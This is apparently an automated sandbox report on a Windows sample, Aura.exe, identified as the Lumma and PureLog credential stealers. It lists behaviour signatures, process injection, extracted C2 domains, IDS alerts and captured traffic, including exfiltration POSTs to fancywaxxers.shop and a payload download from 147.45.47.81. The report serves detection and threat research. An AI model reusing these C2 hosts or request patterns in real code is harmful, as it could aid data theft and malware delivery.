Edit tour

Windows Analysis Report
Aura.exe

Overview

General Information

Sample name:	Aura.exe
Analysis ID:	1584537
MD5:	320bf7fbc1c911b3359527bf0ea85fca
SHA1:	cb1b1244c5e5f902e21252dee0f017d3d4a03046
SHA256:	3b2c100e17a3a58006bfa5ab9fc0bd4a3951f6ca5449d0d8ff7f8f1b3a2c9884
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Aura.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 320BF7FBC1C911B3359527BF0EA85FCA)

conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Aura.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 320BF7FBC1C911B3359527BF0EA85FCA)

Aura.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 320BF7FBC1C911B3359527BF0EA85FCA)

WerFault.exe (PID: 7416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "fancywaxxers.shop", "noisycuttej.shop", "nearycrepso.shop", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop", "cloudewahsj.shop", "framekgirus.shop"], "Build id": "BVnUqo--@hitok4111"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Aura.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1654453374.0000000000BA2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Aura.exe PID: 7328	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.Aura.exe.ba0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Aura.exe.3ef9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Aura.exe.3ef9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:55.784181+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:57.205841+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:58.417248+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.80.1	443	TCP
2025-01-05T19:36:59.557409+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.80.1	443	TCP
2025-01-05T19:37:00.940183+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.80.1	443	TCP
2025-01-05T19:37:02.764925+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	104.21.80.1	443	TCP
2025-01-05T19:37:04.140291+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	104.21.80.1	443	TCP
2025-01-05T19:37:06.819127+0100	2028371	3	Unknown Traffic	192.168.2.4	49750	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:56.714755+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:57.788731+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:37:07.330972+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49750	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:56.714755+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49733	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:57.788731+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49735	104.21.80.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:55.784181+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.80.1	443	TCP
2025-01-05T19:36:57.205841+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.80.1	443	TCP
2025-01-05T19:36:58.417248+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.80.1	443	TCP
2025-01-05T19:36:59.557409+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	104.21.80.1	443	TCP
2025-01-05T19:37:00.940183+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	104.21.80.1	443	TCP
2025-01-05T19:37:02.764925+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	104.21.80.1	443	TCP
2025-01-05T19:37:04.140291+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49747	104.21.80.1	443	TCP
2025-01-05T19:37:06.819127+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49750	104.21.80.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:36:55.301827+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.4	55758	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:37:03.249051+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/O	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/a	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api;	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.Aura.exe.3ef9550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "fancywaxxers.shop", "noisycuttej.shop", "nearycrepso.shop", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop", "cloudewahsj.shop", "framekgirus.shop"], "Build id": "BVnUqo--@hitok4111"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 81.6% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: BVnUqo--@hitok4111

Source: C:\Users\user\Desktop\Aura.exe

Code function: 3_2_004173A6 CryptUnprotectData,

3_2_004173A6

Source: Aura.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: Aura.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: Aura.exe, WER4E99.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER4E99.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER4E99.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+634DEEEBh]	3_2_00441890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	3_2_004311FA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	3_2_004269A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_004451A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h	3_2_004451A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi-2134FE23h]	3_2_00445280
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, word ptr [eax]	3_2_00445280
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then lea edx, dword ptr [esp+4Ah]	3_2_0040CB88
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edx, ecx	3_2_004173A6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0A09591Fh]	3_2_0043E540
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, eax	3_2_0043E540
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edx, eax	3_2_0043061D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	3_2_00421E30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then lea edx, dword ptr [ecx+ecx]	3_2_00409E98
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebx, edx	3_2_00418849
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov esi, ecx	3_2_0043F8D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	3_2_0041C081
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041F890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then push ebx	3_2_0043F140
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0040A95C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043B9C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000194h]	3_2_004301DE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp byte ptr [eax+ecx+01h], 00000000h	3_2_0042D1E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, eax	3_2_0042B9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	3_2_0042B9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edx, ecx	3_2_0042B9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then push 869608D1h	3_2_0042B9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7933AF42h]	3_2_004229B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov esi, eax	3_2_00421272
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000194h]	3_2_004301DC
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edi, eax	3_2_004082D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp+08h], ecx	3_2_0041FAF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041CB80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042D390
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, eax	3_2_004193B3
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [edx], al	3_2_00430416
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	3_2_00431430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebp, dword ptr [esp+24h]	3_2_00414C80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042EC80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	3_2_004311FA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then test esi, esi	3_2_0043F510
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 1E5B02BCh	3_2_00415D3C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_00415D3C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00415D3C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_00441E60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041F620
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edx, eax	3_2_00430622
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 03D746FEh	3_2_00441ED0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, eax	3_2_0042FEE4
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, eax	3_2_0042FF7C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:55758 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49741 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49738 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49747 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49744 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49750 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49745 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: framekgirus.shop

Source: global traffic

TCP traffic: 192.168.2.4:63032 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 147.45.47.81 147.45.47.81
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XU6VIPM8FK357X583User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18162Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N8DPAKDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8729Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XI0FJV2UZOAP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20412Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AHHDWJP8BVYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 948Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IKAVSKJHB7TUENXL0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587863Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/
